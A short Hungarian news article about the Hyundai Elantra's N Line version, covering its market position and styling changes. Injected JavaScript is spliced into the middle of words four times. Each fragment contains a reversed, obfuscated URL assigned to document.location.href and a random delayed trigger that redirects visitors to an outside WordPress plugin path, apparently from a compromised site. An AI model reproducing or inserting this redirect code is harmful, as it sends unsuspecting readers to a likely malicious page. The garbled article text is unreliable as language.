Az Elantra Európában mostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tohagyereke a Hyundainak, Észak-Amerikában viszont, ahol a vele nagyjából azonos méretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosztályba tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozó i30 ismeretlen, húzómodellnek számít. Olyannyira, hogy ezen a szedánon mutatta meg új, megosztó márkaarculatát a Hyundai, most pedig N Line kivitelben is elkészíti a kompakt limuzint. Figyelem: N Line, nem pedig N, azaz nincs brutális teljesítmény, versenyülés és feljavítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott futómű. Van viszont dögös lökhárító masszív légbeömlőkkel, oldalsó kötények, nagyobb fékek és 18 colos felnik. Az ablakok króm helyett fényes fekete körvonalat kaptak, hátul dupla kipufogó és diffúzor zárja a képet.
- Hirdetés -